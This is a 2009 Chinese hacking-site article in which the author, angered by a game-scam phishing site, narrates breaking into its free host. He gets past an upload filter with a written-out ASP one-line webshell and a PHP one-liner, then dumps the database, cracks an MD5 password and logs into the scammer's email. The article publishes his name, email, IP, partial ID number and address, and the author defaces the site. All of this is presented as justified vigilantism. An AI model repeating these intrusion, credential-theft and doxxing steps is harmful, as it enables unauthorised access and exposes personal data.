首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
社会工程学——骗子,是你耍我还是我耍你?
来源: 作者: 发布时间:2009-02-12  

社会工程学——骗子,是你耍我还是我耍你?
小帅@[0.S.T]\杭州跟山中学

某天,小菜我在玩梦幻,为了去成都,我可是决定好好的学习了,最后一次的GAME,玩个爽快吧。师门做玩刷官职。然后跑镖一切都很顺利的进行着。突然的一下,某人加了我的帐号然后找我说是某地方能领奖的,呵呵。几岁的小鬼啊。这都骗到爷爷头上来了,我一向狠死骗子的,于是就开始了反骗子之旅。
他一开始让我去http://reg.txt.cn填写资料然后领取东西,一看就知道只是注册了个txt的cn玉米。根本没什么噱头。如图1

 
(图1)

哈哈,还说自己有500点的点卡。真是XXX,好了,我就开始和他慢慢聊。记得上次买的社会工程学里的(黑手的那个本),介绍说,人的性格分好几种,我看来,骗子属于无所谓,比较耐心的一种,那我就利用这个来和他慢慢聊。如图2

  
(图2)

我的GAME里的 ID是“龙城之帝”,我就假装不大懂电脑般的聊,为了防止他警惕我而不和我讲话,这样的话就少了信息啦!看看下图,图3

 
(图3)

破学狂攻之类的武器属性的东西比较贵,要知道,一个就要多少大洋啊,估算着,小菜我得写多少文章啊,我就吹嘘:“刚才300W买了个破血”,我假借游戏里的一个活动:科举要开始了拖延时间,那我那个时间在干什么呢?!当然是在看网站的结构,在一边看和一边交流的过程中,你会发现很多事,比如网站的一些信息可以随时从对方的口中知道,然而对方没料到的是:我,不是,电脑白痴!我们来看下他建站的信息吧:
首先、他选择了个免费空间,用location来实现跳转。达到欺骗的效果。如图4

 
 
(图4)

很逼真的东西,还冒充奥运,这类人不应该在这个世界上,在文章最后你会知道我为什么这么说。如图5

 
(图5)

这个页面相当逼真。不知道的人一定很顺手的写上去了。随便加了个单引号上去提交。对方的页面到了yahoo的某东西上去,貌似是通过xss的urlcode加密的站,弹出个ok的对话框,呵呵,现在这个潜在的外部的xss也被他利用上了,这个现不管,我也和他一起在那个免费空间注册了个账号,用户为xiaoshua,(少了i),然后成功注册后去看管理页面,如图6

 
(图6)

一看能上传。好,我们开始上传,哪有那么简单就上传上去的啊!当管理是白痴吗?!这个问题困扰了我很久,当上传的东西为一句话或者木马之类的马上提示错误,如图7

 
(图7)

有那个就不行,我就想了,这个能在线编辑,试着把html换成asp的扩展名,然后写“<script languge=vbscript runnat=server>execute request(“fuckj”)</script>”这样的好处就是避开了asp脚本标记。但是不信的发生了,貌似做了措施,无论怎样,后面的地方总会被系统插入什么的,然后提示就变成了Microsoft VBScript 编译器错误 错误 '800a0408'
无效字符
/User/Free100/xiaoshua/index.asp,行 1
eval%20request%28%22%23%22%29
----^
这个不知道怎么。难道就这么放弃了?我才不会,我最最最最最痛恨骗子了!!!想了下,这个空间会不会是全能的呢?支持全部脚本的呢?尝试php失败。最后用php一句话进行在线2次加密才对,其中还爆出了物理路径,呵呵,最后拿到了webshell,如图8


(图8)

不大习惯这个连接端,因为反应比较慢。下载了个angel的spy2008观察之,其实在脑子里就要想好下一步棋怎么样走,我选择了找这个网站的数据库,不知道为什么,总觉对网站检测多了就比较顺手了,找到了conn.asp看到了数据库,如图9

 
(图9)

,接下来就不需要我多说了,既然他注册了账号,那数据库里肯定有信息啦,但是目录很多,我就开始核对时间,测试时间,我是5月11号注册的,知道他的用户是mhxy,因为大家看我的上传页面的路径里有个xiaoshua,也就是部分路径是按照你的username写的。找到了最新的数据库后就下载下来,然后看user表去了,如图10

 
(图10)

大家稍微仔细看下就知道,最后个用户“xiaoshua”(小刷)就是我因为少了个i注册的用户,编码11963的mhxy就是“梦幻西游”的缩写了,目标就是他,然后拿出密码开始跑,成功抛出了MD5如图11

 
(图11)

问了下群里的人,有的人说想电话,看了下他的资料,姓名是:李安。不确定真假,用这个密码去登陆他的cnzz统计,无法登陆,那先算了,其实这个user表里有很多的xy163之类的帐户,因为梦幻西游的官方网站就类似xy3.163之类的,看来可能是团伙作案,呵呵,数据库的作用很大,继续找信息,李安,男,32岁,广东人,邮箱:tyty_XXXX@126.com描述为:梦幻西游,最后登陆IP为:125.90.101.45,为了确认他的资料是否正确,我们只要看下他的IP地址就行了,插了下IP,结果如图12

 
(图12)

的确是广州茂名市的人,这样电话,前面填写的资料的信任度应该为80%了,E-mail是大家喜欢的东西,因为它能搜到更多的信息,于是开始baidu和google,没搜到任何信息,看来是个不混论坛的人,试着用20151120这个密码进他的邮箱吧,没想到进去了,嗯,看下了下,资料满齐全的,这个人也是个玩梦幻的人,于是我开始更深入的社工他,道理很简单:我讨厌骗子!!结果如图13

 
(图13)

偶滴娘喂~~这个人真是个坏蛋啊!十足的大坏蛋,男人不是坏蛋,骗子才是坏蛋!各位女同胞们以后别再骂男人了,男人也有尊严……跑题了,这个里面有信,其中有个信里比较有价值的就是,
尊敬的李安您好:
    谢谢您在我们这里注册成为我们网站的会员,你的会员
帐号为:261593,会员密码为:XXXX。通过此帐
号和密码就可以登陆你的会员中心,方便快捷的实时开通你
需要的新业务,包括域名、空间、邮局、网站推广等服务。
    再次感谢您对我们的支持!
公司:网信科技 - [网通电信-域名注册双线路空间服务器租用]
地址:陕西省咸阳市朝阳五路北口
电话:029-33432627
网址:http://www.oXot.cn/
呵呵,还注册了个东西的,估计又是什么空间的,下定决心继续挖掘信息。把他邮箱克隆到自己的邮箱然后慢慢看个够。后来又发现了个好东西:
尊敬的 韩永金 你好:
    您的将军令已于2007年09月02日 09点33分 被启用, 您填写了如下注册信息:
    用户姓名:韩永金
    证件类型:身份证
    证件号码:440981199010******
    移动电话:
    固定电话:066XXXX
    电子邮箱:tyty_005@126.com
    通信地址:广东茂名市名湖街5XXX号
    邮政编码:525200
    您的将军令信息如下:
    制造日期: 2007年07月24日 03点31分
    启用日期:2007年09月02日 09点33分
    过期日期:2010年07月24日 00点00分
    当前状态:正常
    状态改变时间:2007年09月02日 09点33分
    祝您使用愉快!
网易将军令客户服务中心
2007年09月02日 09点33分
仔细看下,韩永金这个名字肯定是韩国的,因为推行了防沉迷的系统,所以随便找个身份证就行,他的名字叫李安。固定电话什么的可以申诉,于是就跑去163了。可惜申诉不到。这个时候我想到了电话,电话如果……能把来电显示换成北京网监的就好了,我记得黑手的社工书上有个叫秦力的人知道怎么破解。小菜我不会。听说那东西580快一个,我比较穷。就不忽悠那个人了,上Game在游戏里一贴,XX是骗子证据XX.ok,我的责任完了。然后把他的骗子页面全部改个版本。小帅的版本,如图14

 
(图14)

要是我有那个500多快的东西就好了。文章写玩了。骗子应该没人会去相信了。站点也搞清楚了。他的密码还在我手里。因为我要上学的,也没那么长的时间来监视他的行动。领会精神领会精神就行

下载附件


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Hacked PHPBB(dot)COM (入侵PHP
·艰难入侵“中国被黑站点统计系统
·网络攻防实战:由渗透扫描到实施
·利用python特性进行提权
·网络攻防实战:老Y文章管理系统V
·一篇论文引发的入侵——记对当地
·一次完整的安全渗透测试
·修改封包拿WebShell
·利用XSS渗透DISCUZ 6.1.0实战
·php168 v2008后台拿shell方法
·使用BackTrack3破解WEP实战
·入侵某官Game
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved